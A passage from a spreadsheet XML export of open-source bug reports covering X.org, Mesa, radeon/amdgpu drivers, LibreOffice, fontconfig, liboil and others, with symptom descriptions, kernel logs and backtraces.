    <t>Various libxklavier-3.8 Makefiles pass -I for local build- and/or src-dir paths after those flags for global (external support) paths. That can break compiling building libxklavier because an unrelated or incompatible or broken .h installed on the system might mask the expected one in the source tarball. Should always pass all local -I before any global ones.
On the other hand some of those local -I are not needed anyway. Autotools automatically pass -I. and the -I needed to find config.h via DEFAULT_INCLUDES.</t>
  </si>
  <si>
    <t>DRI-28876</t>
  </si>
  <si>
    <t>[radeon HD4250] Frequent lockups while screen locked</t>
  </si>
  <si>
    <t>Created attachment 36664
Xorg log file with nearly 30k lines of repeated messages stripped
Direct symptoms:
- display left unattended with xscreensaver in simple blank mode
- DPMS disabled (checked both with xset and xscreensaver-demo)
- when coming back to my keyboard the monitor does not get a video signal
- I can still login remotely through ssh and reboot the machine properly
Hardware is an Asus M4A88TD-V EVO/USB3 motherboard featuring radeon HD4250 (RS780).  OS is uptodate Debian/testing.
syslog contains lines like the following.  In this case although I was not here it may be that someone tried to use the box.  In the 2 other occurences I have traces for it I may even have been myself but I did not dig at that time.
However although the Xorg.0.log error lines are not timestamped the file timestamp itself matches the box' reboot.  Since there are ~15000 occurences of the error X may have been experiencing them since the error reported by the drm module.  I can try to get more detailed facts next time (unless unnecessary just tell).
Jun 30 10:17:01 home /USR/SBIN/CRON[27295]: (root) CMD (   cd / &amp;&amp; run-parts --report /etc/cron.hourly)
Jun 30 10:18:10 home kernel: [130052.418150] executing set pll
Jun 30 10:18:10 home kernel: [130052.424023] executing set crtc timing
Jun 30 10:18:10 home kernel: [130052.424072] [drm] TMDS-11: set mode 1920x1200 1b
Jun 30 10:18:10 home acpid: client 2095[0:0] has disconnected
Jun 30 10:18:10 home acpid: client connected from 27304[0:0]
Jun 30 10:18:10 home acpid: 1 client rule loaded
Jun 30 10:18:13 home kernel: [130055.829085] [drm:radeon_ib_get] *ERROR* radeon: IB(0:0x0000000010101000:668)
Jun 30 10:18:13 home kernel: [130055.829088] [drm:radeon_ib_get] *ERROR* radeon: GPU lockup detected fail to get a IB
Jun 30 10:18:13 home kernel: [130055.829090] [drm:radeon_cs_ioctl] *ERROR* Failed to get ib !
[...]
Jun 30 10:18:42 home kernel: [130084.275900] [drm:radeon_ib_get] *ERROR* radeon: IB(0:0x0000000010101000:668)
Jun 30 10:18:42 home kernel: [130084.275906] [drm:radeon_ib_get] *ERROR* radeon: GPU lockup detected fail to get a IB
Jun 30 10:18:42 home kernel: [130084.275912] [drm:radeon_cs_ioctl] *ERROR* Failed to get ib !
Jun 30 11:17:01 home /USR/SBIN/CRON[27329]: (root) CMD (   cd / &amp;&amp; run-parts --report /etc/cron.hourly)
In older occurences (do not recall the precise set of events although the wishing to unlock screen event has always been the only way to see the problem) the 3 error lines occur on a longer timespan some in sync with the clock (??):
Jun 27 19:17:01 home /USR/SBIN/CRON[26082]: (root) CMD (   cd / &amp;&amp; run-parts --report /etc/cron.hourly)
Jun 27 19:18:09 home kernel: [21853.241075] executing set pll
Jun 27 19:18:09 home kernel: [21853.248025] executing set crtc timing
Jun 27 19:18:09 home kernel: [21853.248076] [drm] TMDS-11: set mode 1920x1200 1b
Jun 27 19:18:12 home kernel: [21856.334252] [drm:radeon_ib_get] *ERROR* radeon: IB(0:0x0000000010101000:668)
Jun 27 19:18:12 home kernel: [21856.334261] [drm:radeon_ib_get] *ERROR* radeon: GPU lockup detected fail to get a IB
Jun 27 19:18:12 home kernel: [21856.334269] [drm:radeon_cs_ioctl] *ERROR* Failed to get ib !
[...]
Jun 27 19:18:32 home kernel: [21876.279726] [drm:radeon_ib_get] *ERROR* radeon: IB(0:0x0000000010101000:668)
Jun 27 19:18:32 home kernel: [21876.279733] [drm:radeon_ib_get] *ERROR* radeon: GPU lockup detected fail to get a IB
Jun 27 19:18:32 home kernel: [21876.279739] [drm:radeon_cs_ioctl] *ERROR* Failed to get ib !
Jun 27 19:19:00 home kernel: [21904.282670] [drm:radeon_ib_get] *ERROR* radeon: IB(0:0x0000000010101000:668)
Jun 27 19:19:00 home kernel: [21904.282678] [drm:radeon_ib_get] *ERROR* radeon: GPU lockup detected fail to get a IB
Jun 27 19:19:00 home kernel: [21904.282685] [drm:radeon_cs_ioctl] *ERROR* Failed to get ib !
Jun 27 19:20:00 home kernel: [21964.322037] [drm:radeon_ib_get] *ERROR* radeon: IB(0:0x0000000010101000:668)
Jun 27 19:20:00 home kernel: [21964.322045] [drm:radeon_ib_get] *ERROR* radeon: GPU lockup detected fail to get a IB
Jun 27 19:20:00 home kernel: [21964.322052] [drm:radeon_cs_ioctl] *ERROR* Failed to get ib !
Jun 27 19:21:00 home kernel: [22024.321528] [drm:radeon_ib_get] *ERROR* radeon: IB(0:0x0000000010101000:668)
Jun 27 19:21:00 home kernel: [22024.321537] [drm:radeon_ib_get] *ERROR* radeon: GPU lockup detected fail to get a IB
Jun 27 19:21:00 home kernel: [22024.321544] [drm:radeon_cs_ioctl] *ERROR* Failed to get ib !
Jun 27 19:22:00 home kernel: [22084.321217] [drm:radeon_ib_get] *ERROR* radeon: IB(0:0x0000000010101000:668)
Jun 27 19:22:00 home kernel: [22084.321225] [drm:radeon_ib_get] *ERROR* radeon: GPU lockup detected fail to get a IB
Jun 27 19:22:00 home kernel: [22084.321232] [drm:radeon_cs_ioctl] *ERROR* Failed to get ib !
Jun 27 19:23:00 home kernel: [22144.367818] [drm:radeon_ib_get] *ERROR* radeon: IB(0:0x0000000010101000:668)
Jun 27 19:23:00 home kernel: [22144.367827] [drm:radeon_ib_get] *ERROR* radeon: GPU lockup detected fail to get a IB
Jun 27 19:23:00 home kernel: [22144.367833] [drm:radeon_cs_ioctl] *ERROR* Failed to get ib !
Jun 27 19:24:00 home kernel: [22204.414007] [drm:radeon_ib_get] *ERROR* radeon: IB(0:0x0000000010101000:668)
Jun 27 19:24:00 home kernel: [22204.414015] [drm:radeon_ib_get] *ERROR* radeon: GPU lockup detected fail to get a IB
Jun 27 19:24:00 home kernel: [22204.414022] [drm:radeon_cs_ioctl] *ERROR* Failed to get ib !
Jun 27 19:24:12 home kernel: [22216.304962] [drm:radeon_ib_get] *ERROR* radeon: IB(0:0x0000000010101000:668)
Jun 27 19:24:12 home kernel: [22216.304970] [drm:radeon_ib_get] *ERROR* radeon: GPU lockup detected fail to get a IB
Jun 27 19:24:12 home kernel: [22216.304977] [drm:radeon_cs_ioctl] *ERROR* Failed to get ib !
Xorg.0.log repeated messages are:
(EE) RADEON(0): Timeout trying to update memory controller settings !
(EE) RADEON(0): You will probably crash now ... 
Package versions are as follows (dpkg -l|grep xserver):
x11-xserver-utils                                    7.5+1                  
xserver-common                                       2:1.7.7-2              
xserver-xephyr                                       2:1.7.7-2              
xserver-xorg                                         1:7.5+6                
xserver-xorg-core                                    2:1.7.7-2              
xserver-xorg-core-dbg                                2:1.7.7-2              
xserver-xorg-input-all                               1:7.5+6                
xserver-xorg-input-evdev                             1:2.3.2-6              
xserver-xorg-input-synaptics                         1.2.2-2                
xserver-xorg-input-wacom                             0.10.5+20100416-1      
xserver-xorg-video-ati                               1:6.13.0-2             
xserver-xorg-video-fbdev                             1:0.4.2-2              
xserver-xorg-video-mach64                            6.8.2-3                
xserver-xorg-video-mga                               1:1.4.11.dfsg-4        
xserver-xorg-video-r128                              6.8.1-3                
xserver-xorg-video-radeon                            1:6.13.0-2             
xserver-xorg-video-radeon-dbg                        1:6.13.0-2             
xserver-xorg-video-vesa                              1:2.3.0-3</t>
  </si>
  <si>
    <t>XORG-94099</t>
  </si>
  <si>
    <t>missing bounds check in makedepend</t>
  </si>
  <si>
    <t>Created attachment 121688
bounds check of fp pointer assignment
when assigning source code files from the command line to the fp pointer no bounds check is done and if more than MAXFILES file names are specified on the command line memory will be overridden out of bounds. The attached patch will check those bounds and abort program execution.</t>
  </si>
  <si>
    <t>doj</t>
  </si>
  <si>
    <t>DBUS-9334</t>
  </si>
  <si>
    <t>rename dbus_watch_get_fd</t>
  </si>
  <si>
    <t>Qt uses dbus_watch_get_fd but on Windows
it doesn't get the fd but a handle so we
must introduce a function which exports the fd.
On Windows dbus_watch_get_fd acts more
like get_handle.
Attached a patch which renames dbus_watch_get_fd 
into dbus_watch_get_handle and which introduces
a new functions which exports the fd.</t>
  </si>
  <si>
    <t>syntheticpp</t>
  </si>
  <si>
    <t>LIBREOFFICE-51309</t>
  </si>
  <si>
    <t>Names of DatabaseRanges should not be case sensitive</t>
  </si>
  <si>
    <t>Some of my macros break because of case-sensitive DBRange names.
nrg = ThisComponent.NamedRanges.getByName(sal) gets named range SAL
addrg = ThisCOmponent.Sheets(0).getCellRangeByName(a1) gets cell A1
dbrg = ThisComponent.DatabaseRanges.getByName(apo_umsatz) raises no such element exception instead of returning database range APO_Umsatz
Like anything else DBRange names are case-insensitive in the UI.</t>
  </si>
  <si>
    <t>call.protected</t>
  </si>
  <si>
    <t>SYNCEVOLUTION-59265</t>
  </si>
  <si>
    <t>ActiveSync</t>
  </si>
  <si>
    <t>Exchange 10 server requires X-MS-PolicyKey: 0</t>
  </si>
  <si>
    <t>Created attachment 72882
Force X-MS-PolicyKey: 0
When using activesyncd to access my employer's Exchange server I received a 403 error on the first command.  Note that this was not a username/password error (that gives error 401).
The problem was fixed by including X-MS-PolicyKey: 0 in the request header (which triggered provisioning).
A patch to eas-connection.c is attached.</t>
  </si>
  <si>
    <t>g+syncevolution</t>
  </si>
  <si>
    <t>LIBREOFFICE-41599</t>
  </si>
  <si>
    <t>contrib: Add available dictionary for language PÄli</t>
  </si>
  <si>
    <t>It seems there is a new dictionary available under GPL from  I found that on Apache OOo Bugzilla 
Should be tested and added!
I will contact author!</t>
  </si>
  <si>
    <t>MESA-108457</t>
  </si>
  <si>
    <t>[OpenGL CTS] KHR-GL46.tessellation_shader.single.xfb_captures_data_from_correct_stage fails</t>
  </si>
  <si>
    <t>With the landing of update f75a5cccd800bb011b44c799415efdfe547d6076 at OpenGL CTS 4.6.0  KHR-GL46.tessellation_shader.single.xfb_captures_data_from_correct_stage starts failing.
commit f75a5cccd800bb011b44c799415efdfe547d6076
Author: Piers Daniell 
Date:   Tue Oct 2 11:51:25 2018 -0600
    Use non-arrayed varying name for TCS blocks
    This is a partial revert of CL 2625 to restore naming the
    value member of the BLOCK_INOUT interface block as
    BLOCK_INOUT.value rather than BLOCK_INOUT[0].value.
    Affects:
    KHR-GL46.tessellation_shader.single.xfb_captures_data_from_correct_stage
    Components: OpenGL
    VK-GL-CTS issue: 1388
    Change-Id: I9ef6453ec5465a0fa5561220cc9d7bfe54298416
Mesa populates the transform feedback candidates with the following names because TCS interface block is arrayed:
BLOCK_INOUT[0].value
BLOCK_INOUT[1].value
BLOCK_INOUT[2].value
BLOCK_INOUT[3].value
As now the tests has been changed to use as XFB name BLOCK_INOUT.value the variable isn't found and a linking error is raised.
More details about the motivations of the test modification are available at Khronos Gitlab.</t>
  </si>
  <si>
    <t>jmcasanova</t>
  </si>
  <si>
    <t>FONTCONFIG-12927</t>
  </si>
  <si>
    <t>Update CaseFolding.txt to Unicode 5.1.0</t>
  </si>
  <si>
    <t>http://www.unicode.org/Public/5.1.0/ucd/CaseFolding-5.1.0d1.txt</t>
  </si>
  <si>
    <t>LIBOIL-19672</t>
  </si>
  <si>
    <t>function mas10_u8_mmx_2 in class mas10_u8_l15 failed check</t>
  </si>
  <si>
    <t>liboil-0.3.15
function mas10_u8_mmx_2 in class mas10_u8_l15 failed check
(AMD64)
# printcpu
ERROR ...
CPU flags: cmov mmx sse mmxext sse2 3dnow 3dnowext sse3
# oil-test mas10_u8_l15
...
impl mas10_u8_mmx_2
  ave=811 std=1.125
OIL: ERROR liboiltest.c 405: oil_test_check_impl(): function mas10_u8_mmx_2 in class mas10_u8_l15 failed check (730 &gt; 0) || (outside=0)
  (this test) ave=587 std=inf
  abs diff=730
  d:
    68
    108
    44
    *255*
    *255*
    *0*
    56
    *0*
    *131*
    *0*
...
# report
...
mas10_u8_l15         4 4813       921.25     5.22         mas10_u8_mmx
...
# oil-bugreport
OIL: INFO liboildebug.c 67: _oil_debug_init(): liboil-0.3.15 debug init
OIL: INFO liboilfault.c 111: oil_fault_check_enable(): enabling SIGILL handler.  Make sure to continue past any SIGILL signals caught by gdb.
OIL: INFO liboilfault.c 166: oil_fault_check_disable(): disabling SIGILL handler
OIL: INFO liboilcpu-x86.c 251: oil_cpu_detect_cpuid(): L1 D-cache: 64 kbytes 2-way 1 lines/tag 64 line size
OIL: INFO liboilcpu-x86.c 253: oil_cpu_detect_cpuid(): L1 I-cache: 64 kbytes 2-way 1 lines/tag 64 line size
OIL: INFO liboilcpu-x86.c 257: oil_cpu_detect_cpuid(): L2 cache: 1024 kbytes 8 assoc 1 lines/tag 64 line size
OIL: INFO liboilcpu.c 120: _oil_cpu_init(): cpu flags 00ff0000
OIL: INFO liboilfault.c 111: oil_fault_check_enable(): enabling SIGILL handler.  Make sure to continue past any SIGILL signals caught by gdb.
OIL: ERROR liboiltest.c 405: oil_test_check_impl(): function mas10_u8_mmx_2 in class mas10_u8_l15 failed check (7220 &gt; 0) || (outside=0)
OIL: WARNING liboilfunction.c 397: oil_class_optimize(): disabling implementation mas10_u8_mmx_2
OIL: INFO liboilfunction.c 185: oil_optimize_all(): 415 classes 1087 implementations 0 enabled
OIL: INFO liboilfault.c 166: oil_fault_check_disable(): disabling SIGILL handler
OIL: INFO liboilfunction.c 143: oil_init(): oil_init() finished
...
mas10_u8_l15         4 4726       880        5.37         mas10_u8_mmx_3
...
disturbing me is that nothing is enabled as oil-report says ?
OIL: INFO liboilfunction.c 185: oil_optimize_all(): 415 classes 1087 implementations 0 enabled</t>
  </si>
  <si>
    <t>kwbes</t>
  </si>
  <si>
    <t>MESA-101286</t>
  </si>
  <si>
    <t>Team Fortress 2 GPU Hang ecode 7:0:0x85dffffc</t>
  </si>
  <si>
    <t>Created attachment 131691
DMESG</t>
  </si>
  <si>
    <t>POLICYKIT-29871</t>
  </si>
  <si>
    <t>0.98 fails to build with binutils gold</t>
  </si>
  <si>
    <t>Created attachment 38263
build log
PolicyKit 0.98 fails to build with binutils-gold which requires to list all link dependencies explicitly. The attached build log shows the failure.
Linking polkit_agent_helper_1 against GLIB_LIBS (as done in the attached patch)
fixes this issue.</t>
  </si>
  <si>
    <t>FONTCONFIG-15996</t>
  </si>
  <si>
    <t>Add Secwepemctsin Orthography</t>
  </si>
  <si>
    <t>Created attachment 16608
orthography for secwepemctsin
Please add Orthography for Secwepemctsin
I've added a shs.orth as an attachment.
Also I would like to add the Language Geek website has collected all of the orthographies for the Indigenous Languages of North America.
http://www.languagegeek.com/alllangs/listoflangs.html
It looks like no one has made .orth files for any of these languages I'll be working on submitting more orthographies from the website so any feedback on this would be great.
-Neskie</t>
  </si>
  <si>
    <t>MESA-30650</t>
  </si>
  <si>
    <t>ut2004-demo segfault since r600g: use dirty list to track dirty blocks</t>
  </si>
  <si>
    <t>rv790 d-r-t git ddxmesalibdrm and xserver 1.9
ut2004 demo segfaults for me since -
commit ac8a1ebe55b08180945ffaebcff6b3bed336c9ec
Author: Bas Nieuwenhuizen 
Date:   Tue Oct 5 21:01:43 2010 +0200
    r600g: use dirty list to track dirty blocks
    Got a speed up by tracking the dirty blocks in a seperate list instead of looping through all blocks. This version should work with block that get their dirty state disabled again and I added a dirty check during the flush as some blocks were already dirty.
Log: [ 1]  ./ut2004-bin [0x85a5921]
Log: [ 2]  [0xffffe400]
Log: [ 3]  /home/andy/Src/Mesa-git/mesa/lib/gallium/r600_dri.so [0xb40d31a1]
Log: [ 4]  /home/andy/Src/Mesa-git/mesa/lib/gallium/r600_dri.so [0xb40b20e1]
Log: [ 5]  /home/andy/Src/Mesa-git/mesa/lib/gallium/r600_dri.so [0xb42565cd]
Log: [ 6]  /home/andy/Src/Mesa-git/mesa/lib/gallium/r600_dri.so [0xb42342aa]
Log: [ 7]  /home/andy/Src/Mesa-git/mesa/lib/gallium/r600_dri.so [0xb4231539]
Log: [ 8]  /home/andy/Src/Mesa-git/mesa/lib/gallium/r600_dri.so [0xb42047be]
Log: [ 9]  /home/andy/Src/Mesa-git/mesa/lib/gallium/r600_dri.so [0xb4228cfe]
Log: [10]  /home/andy/Src/Mesa-git/mesa/lib/gallium/r600_dri.so [0xb422936a]
Log: [11]  /home/andy/Src/Mesa-git/mesa/lib/gallium/r600_dri.so [0xb4185585]
Log: [12]  ./ut2004-bin(_ZN22FOpenGLRenderInterface13DrawPrimitiveE14EPrimitiveTypeiiii+0x2dd) [0x87089cd]
Log: [13]  ./ut2004-bin(_Z11DrawSectionP11UStaticMeshiP9UMaterialP16FRenderInterface+0xbf) [0x834b77f]
Log: [14]  ./ut2004-bin(_Z16RenderStaticMeshP13FDynamicActorP15FLevelSceneNodeP5TListIP13FDynamicLightEPS3_IP20FProjectorRenderInfoEP16FRenderInterface+0x14f4) [0x834d5c4]
Log: [15]  ./ut2004-bin(_ZN13FDynamicActor6RenderEP15FLevelSceneNodeP5TListIP13FDynamicLightEPS2_IP20FProjectorRenderInfoEP16FRenderInterface+0x22eb) [0x83134cb]
Log: [16]  ./ut2004-bin [0x83378ec]
Log: [17]  ./ut2004-bin(_Z11RenderLevelP15FLevelSceneNodeP16FRenderInterface+0xed2) [0x8334212]
Log: [18]  ./ut2004-bin(_ZN15FLevelSceneNode6RenderEP16FRenderInterface+0x66c) [0x831b52c]
Log: [19]  ./ut2004-bin(_Z11RenderLevelP15FLevelSceneNodeP16FRenderInterface+0xc79) [0x8333fb9]
Log: [20]  ./ut2004-bin(_ZN15FLevelSceneNode6RenderEP16FRenderInterface+0x66c) [0x831b52c]
Log: [21]  ./ut2004-bin(_Z11RenderLevelP15FLevelSceneNodeP16FRenderInterface+0xc79) [0x8333fb9]
Log: [22]  ./ut2004-bin(_ZN15FLevelSceneNode6RenderEP16FRenderInterface+0x66c) [0x831b52c]
Log: [23]  ./ut2004-bin(_Z11RenderLevelP15FLevelSceneNodeP16FRenderInterface+0xc79) [0x8333fb9]
Log: [24]  ./ut2004-bin(_ZN15FLevelSceneNode6RenderEP16FRenderInterface+0x66c) [0x831b52c]
Log: [25]  ./ut2004-bin(_ZN16FPlayerSceneNode6RenderEP16FRenderInterface+0x1da) [0x831f8ba]
Log: [26]  ./ut2004-bin(_ZN11UGameEngine4DrawEP9UViewportiPhPi+0x6c4) [0x8240f04]
Log: [27]  ./ut2004-bin(_ZN12USDLViewport7RepaintEi+0x56) [0x86f8136]
Log: [28]  ./ut2004-bin(_ZN10USDLClient4TickEv+0x159) [0x86f6359]
Log: [29]  ./ut2004-bin(_ZN11UGameEngine4TickEf+0x517) [0x82459b7]
Log: [30]  ./ut2004-bin(_ZN9CMainLoop7RunLoopEv+0x108) [0x815a7a8]
Log: [31]  ./ut2004-bin [0x81521cf]
Log: [32]  ./ut2004-bin(main+0x2c8f) [0x814e1df]
Log: [33]  /lib/libc.so.6(__libc_start_main+0xd0) [0xb74f7380]
Log: [34]  ./ut2004-bin(readdir+0x95) [0x814b321]</t>
  </si>
  <si>
    <t>LIBREOFFICE-79668</t>
  </si>
  <si>
    <t>FILESAVE: Corrupt: Attached file got corrupted after RT on Windows &amp; Ubuntu Build (Without dbgutil build)</t>
  </si>
  <si>
    <t>Problem description: Attached file got corrupted after RT on windows Build
Steps to reproduce:
1. Try to Open file in LibreOffice (On windows Build)
2. save it back to docx format
3. open RoundTripped file in MS office.
Expected Result:
The file should open properly.
Actual Result:
File is corrupt.
Operating System: All
Version: 4.4.0.0.alpha0+ Master</t>
  </si>
  <si>
    <t>tushar.bende</t>
  </si>
  <si>
    <t>TELEPATHY-18513</t>
  </si>
  <si>
    <t>telepathy-haze from git errors on compile</t>
  </si>
  <si>
    <t>Created attachment 20276
patch via git diff src/connection-avatars.c
cc1: warnings being treated as errors
connection-avatars.c: In function â€˜haze_connection_request_avatarâ€™:
connection-avatars.c:271: error: format not a string literal and no format arguments
connection-avatars.c: In function â€˜haze_connection_set_avatarâ€™:
connection-avatars.c:345: error: format not a string literal and no format arguments
make[2]: *** [connection-avatars.o] Error 1
The attached patch fixes it for me.  Docs say for g_set_error we need a format string and then arguments.  Someone is trying to pass in a string.  Removing the g_strdup_printf and moving the format string and arguments down fixes it.</t>
  </si>
  <si>
    <t>larry</t>
  </si>
  <si>
    <t>DRI-107978</t>
  </si>
  <si>
    <t>[amdgpu] Switching to tty fails with DisplayPort 1.2 monitor going to sleep (REG_WAIT timeout / dce110_stream_encoder_dp_blank)</t>
  </si>
  <si>
    <t>After upgrading to Linux 4.19-rc3 (from 4.18.x) I can't switch to tty anymore the monitor connected over DisplayPort goes into sleep mode.
I see this in dmesg when it happens:
[37342.777399] [drm:generic_reg_wait [amdgpu]] *ERROR* REG_WAIT timeout 10us * 3000 tries - dce110_stream_encoder_dp_blank line:922
[37342.777477] WARNING: CPU: 4 PID: 14403 at drivers/gpu/drm/amd/amdgpu/../display/dc/dc_helper.c:254 generic_reg_wait+0xe7/0x160 [amdgpu]
[37342.777478] Modules linked in: uas usb_storage rfcomm ebtable_filter ebtables devlink ip6table_filter ip6_tables iptable_filter cmac bnep arc4 nls_ascii nls_cp437 vfat amdkfd fat snd_hda_codec_realtek snd_hda_codec_generic edac_mce_amd btusb btrtl amdgpu btbcm snd_hda_codec_hdmi btintel iwlmvm snd_usb_audio snd_hda_intel bluetooth kvm_amd snd_hda_codec snd_usbmidi_lib wmi_bmof mxm_wmi mac80211 snd_hda_core kvm uvcvideo videobuf2_vmalloc snd_hwdep videobuf2_memops snd_rawmidi jitterentropy_rng videobuf2_v4l2 videobuf2_common snd_seq_device chash iwlwifi irqbypass gpu_sched videodev snd_pcm crct10dif_pclmul ttm crc32_pclmul media drbg snd_timer evdev drm_kms_helper cfg80211 ansi_cprng ghash_clmulni_intel efi_pstore pcspkr drm snd k10temp ecdh_generic soundcore efivars rfkill crc16 sp5100_tco sg ccp
[37342.777514]  rng_core wmi pcc_cpufreq button acpi_cpufreq nct6775 hwmon_vid parport_pc ppdev lp parport efivarfs ip_tables x_tables autofs4 xfs btrfs xor zstd_decompress zstd_compress xxhash raid6_pq libcrc32c crc32c_generic hid_generic usbhid hid sd_mod crc32c_intel ahci xhci_pci libahci aesni_intel xhci_hcd aes_x86_64 crypto_simd libata igb cryptd glue_helper nvme usbcore scsi_mod i2c_piix4 i2c_algo_bit nvme_core dca usb_common gpio_amdpt gpio_generic
[37342.777542] CPU: 4 PID: 14403 Comm: kworker/4:1 Tainted: G        W         4.19.0-rc3-amd64 #1 Debian 4.19~rc3-1~exp1
[37342.777542] Hardware name: To Be Filled By O.E.M. To Be Filled By O.E.M./X370 Taichi BIOS L4.64 04/03/2018
[37342.777558] Workqueue: events drm_mode_rmfb_work_fn [drm]
[37342.777615] RIP: 0010:generic_reg_wait+0xe7/0x160 [amdgpu]
[37342.777617] Code: 44 24 58 8b 54 24 48 89 de 44 89 4c 24 08 48 8b 4c 24 50 48 c7 c7 20 9d b5 c1 e8 64 e6 f0 fe 83 7d 18 01 44 8b 4c 24 08 74 02  0b 48 83 c4 10 44 89 c8 5b 5d 41 5c 41 5d 41 5e 41 5f c3 41 0f
[37342.777618] RSP: 0018:ffffa2ae81b9ba20 EFLAGS: 00010297
[37342.777620] RAX: 0000000000000000 RBX: 000000000000000a RCX: 0000000000000000
[37342.777621] RDX: 0000000000000000 RSI: ffff93d74eb166a8 RDI: ffff93d74eb166a8
[37342.777622] RBP: ffff93d746439180 R08: 0000000000000000 R09: 0000000000010200
[37342.777623] R10: 0720072007200720 R11: 0720073207320739 R12: 0000000000000bb9
[37342.777624] R13: 00000000000051e2 R14: 0000000000010000 R15: 0000000000000000
[37342.777625] FS:  0000000000000000(0000) GS:ffff93d74eb00000(0000) knlGS:0000000000000000
[37342.777626] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[37342.777627] CR2: 0000558f62bfa9d0 CR3: 00000003f2c38000 CR4: 00000000003406e0
[37342.777628] Call Trace:
[37342.777695]  dce110_stream_encoder_dp_blank+0x12c/0x1a0 [amdgpu]
[37342.777754]  core_link_disable_stream+0x54/0x220 [amdgpu]
[37342.777813]  dce110_reset_hw_ctx_wrap+0xc1/0x1e0 [amdgpu]
[37342.777872]  dce110_apply_ctx_to_hw+0x45/0x650 [amdgpu]
[37342.777928]  ? dc_remove_plane_from_context+0x1fc/0x240 [amdgpu]
[37342.777985]  dc_commit_state+0x2c6/0x520 [amdgpu]
[37342.778047]  amdgpu_dm_atomic_commit_tail+0x37a/0xd80 [amdgpu]
[37342.778052]  ? __wake_up_common_lock+0x89/0xc0
[37342.778054]  ? _cond_resched+0x15/0x30
[37342.778056]  ? wait_for_completion_timeout+0x3b/0x1a0
[37342.778117]  ? amdgpu_dm_atomic_commit_tail+0xd80/0xd80 [amdgpu]
[37342.778126]  commit_tail+0x3d/0x70 [drm_kms_helper]
[37342.778133]  drm_atomic_helper_commit+0xb4/0x120 [drm_kms_helper]
[37342.778148]  drm_framebuffer_remove+0x361/0x410 [drm]
[37342.778164]  drm_mode_rmfb_work_fn+0x4f/0x60 [drm]
[37342.778167]  process_one_work+0x1a7/0x360
[37342.778169]  worker_thread+0x30/0x390
[37342.778171]  ? pwq_unbound_release_workfn+0xd0/0xd0
[37342.778173]  kthread+0x112/0x130
[37342.778175]  ? kthread_bind+0x30/0x30
[37342.778177]  ret_from_fork+0x22/0x40
[37342.778179] ---[ end trace 3d987dd66a59ffb4 ]---
OS: Debian testing kernel 4.19~rc3-1~exp1
GPU: Sapphire Pulse Vega 56.
amdgpu firmware: 20180825+dfsg-1</t>
  </si>
  <si>
    <t>PIGLIT-57970</t>
  </si>
  <si>
    <t>fbo-blending-formats.c:262: test_format: Assertion `piglit_dispatch_glGetError() == 0' failed.</t>
  </si>
  <si>
    <t>piglit: 576a4f57677ec3dec34cd578f787600a9a8c0889 (master)
Run fbo-blending-formats on Mesa swrast.
$ ./bin/fbo-blending-formats -auto
Using test set: Core formats
Mesa: User error: GL_INVALID_ENUM in glGetTexLevelParameter[if]v(pname=GL_TEXTURE_RED_TYPE)
fbo-blending-formats: piglit/tests/fbo/fbo-blending-formats.c:262: test_format: Assertion `piglit_dispatch_glGetError() == 0' failed.
Aborted (core dumped)
(gdb) bt
#0  0x00007f7e21a63e35 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:63
#1  0x00007f7e21a67498 in __GI_abort () at abort.c:90
#2  0x00007f7e21a5cbd3 in __assert_fail_base (fmt=0x7f7e21bad170 %s%s%s:%u: %s%sAssertion `%s' failed.\n%n 
    assertion=assertion@entry=0x4061b0 piglit_dispatch_glGetError() == 0 
    file=file@entry=0x406178 piglit/tests/fbo/fbo-blending-formats.c line=line@entry=262 
    function=function@entry=0x406492  test_format) at assert.c:92
#3  0x00007f7e21a5cc82 in __GI___assert_fail (assertion=0x4061b0 piglit_dispatch_glGetError() == 0 
    file=0x406178 piglit/tests/fbo/fbo-blending-formats.c line=262 
    function=0x406492  test_format) at assert.c:101
#4  0x0000000000402f0f in test_format (format=0x403a00 ) at piglit/tests/fbo/fbo-blending-formats.c:262
#5  0x0000000000401c30 in fbo_formats_display (test_format=0x401f41 ) at piglit/tests/fbo/fbo-formats.h:641
#6  0x0000000000403728 in piglit_display () at piglit/tests/fbo/fbo-blending-formats.c:384
#7  0x00007f7e21e5040c in display () at piglit/tests/util/piglit-framework-gl/piglit_glut_framework.c:60
#8  0x00007f7e21806fc4 in fghRedrawWindow (window=0xe58440) at freeglut_main.c:210
#9  fghcbDisplayWindow (window=0xe58440 enumerator=0x7fff922e6600) at freeglut_main.c:227
#10 0x00007f7e2180a719 in fgEnumWindows (enumCallback=enumCallback@entry=0x7f7e21806f20  
    enumerator=enumerator@entry=0x7fff922e6600) at freeglut_structure.c:394
#11 0x00007f7e2180745c in fghDisplayAll () at freeglut_main.c:249
#12 glutMainLoopEvent () at freeglut_main.c:1450
#13 0x00007f7e21807d1d in glutMainLoop () at freeglut_main.c:1498
#14 0x00007f7e21e505de in run_test (gl_fw=0x7f7e22118820  argc=1 argv=0x7fff922e69b8)
    at piglit/tests/util/piglit-framework-gl/piglit_glut_framework.c:127
#15 0x00007f7e21e4e6fd in piglit_gl_test_run (argc=1 argv=0x7fff922e69b8 config=0x7fff922e68a0)
    at piglit/tests/util/piglit-framework-gl.c:127
#16 0x0000000000401d5e in main (argc=2 argv=0x7fff922e69b8) at piglit/tests/fbo/fbo-blending-formats.c:41
(gdb) frame 4
#4  0x0000000000402f0f in test_format (format=0x403a00 ) at piglit/tests/fbo/fbo-blending-formats.c:262
262		assert(glGetError() == 0)
(gdb) l
257		glFramebufferTexture2DEXT(GL_FRAMEBUFFER_EXT
258					  GL_COLOR_ATTACHMENT0_EXT
259					  GL_TEXTURE_2D
260					  tex
261					  0)
262		assert(glGetError() == 0)
263	
264		status = glCheckFramebufferStatusEXT(GL_FRAMEBUFFER_EXT)
265		printf(Testing %s format-&gt;name)
266		if (status != GL_FRAMEBUFFER_COMPLETE_EXT) {
8c7e49c402025a3db3675954377478bd832189dd is the first bad commit
commit 8c7e49c402025a3db3675954377478bd832189dd
Author: JosÃ© Fonseca 
Date:   Wed Dec 5 23:46:59 2012 +0000
    fbo-blending-formats: Correct precision of signed normalized types.
    Signed types have less precision due to the sign bit.
    Without this it is impossible to devise an efficient way of lerping
    signed normalized types that makes this test happy -- it would require
    32bit float/int multiply and divides to get exact results.
    Reviewed-by: Brian Paul 
:040000 040000 4b5f8b268e87399886e8596afbdad9742c2bb4eb d05e8d2f47d94c3d13ab519bab70bdf547f59879 M	tests
bisect run success</t>
  </si>
  <si>
    <t>XORG-24330</t>
  </si>
  <si>
    <t>wrong detected monitor resolution</t>
  </si>
  <si>
    <t>Created attachment 30092
Stock driver from debain testing version 1.2.5
